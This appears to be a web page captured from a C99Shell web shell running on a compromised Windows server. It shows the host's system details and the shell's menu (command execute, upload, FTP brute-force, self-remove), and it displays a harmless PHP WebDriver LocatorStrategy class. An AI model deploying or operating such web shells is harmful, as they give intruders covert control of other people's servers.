!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\php\pear\phpwebdriver\   drwxrwxrwx
Free 8.01 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     LocatorStrategy.php (900 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
class LocatorStrategy {
    
/**Returns an element whose class name contains the search value; compound class names are not permitted.*/
    
const className="class name";

    
/**Returns an element matching a CSS selector.*/
    
const cssSelector="css selector";

    
/**Returns an element whose ID attribute matches the search value.*/
    
const id="id";

    
/**Returns an element whose NAME attribute matches the search value.*/
    
const name="name";

    
/**Returns an anchor element whose visible text matches the search value.*/
    
const linkText="link text";

    
/**Returns an anchor element whose visible text partially matches the search value.*/
    
const partialLinkText="partial link text";

    
/**Returns an element whose tag name matches the search value.*/
    
const tagName="tag name";

    
/**Returns an element matching an XPath expression.*/
    
const xpath="xpath";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--